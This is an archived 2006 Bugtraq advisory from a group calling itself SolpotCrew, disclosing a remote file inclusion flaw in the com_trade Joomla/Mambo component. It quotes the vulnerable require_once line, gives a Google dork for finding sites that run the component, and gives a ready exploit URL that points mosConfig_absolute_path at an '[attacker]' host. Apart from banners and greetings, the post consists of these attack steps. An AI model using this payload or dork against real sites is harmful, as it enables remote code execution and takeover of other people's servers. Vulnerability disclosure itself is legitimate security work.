| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 21 Jul 2006 22:36:44 -0000 From: mail@...plah.com To: bugtraq@...urityfocus.com Subject: SolpotCrew Advisory #3 - com_trade Remote File Inclusion (mosConfig_absolute_path) #############################SolpotCrew Community################################ # # com_trade Remote File Inclusion (mosConfig_absolute_path) # # original advisory : http://solpotcrew.org/adv/BlueSpy-adv-com_trade.txt # ################################################################################# # # # Bug Found By :Blue|Spy # # contact: mail@...plah.com # # Website : http://kunamgede.biz, http://blue-spy.com # ################################################################################ # # # Greetz: h4ntu , Fungky, Solpot, Matdhule # and all crew #mardongan @ irc.dal.net # # ############################################################################### code from tradetop.php require_once( $mosConfig_absolute_path."/components/com_trade/includes/trade/database.php" ); Dork: inurl:com_trade exploit: http://site.com/[path]//administrator/components/com_trade/includes/trade/tradetop.php?mosConfig_absolute_path=[attacker] ##############################MY LOVE JUST FOR U LIENA######################### ########################################################################
Powered by blists - more mailing lists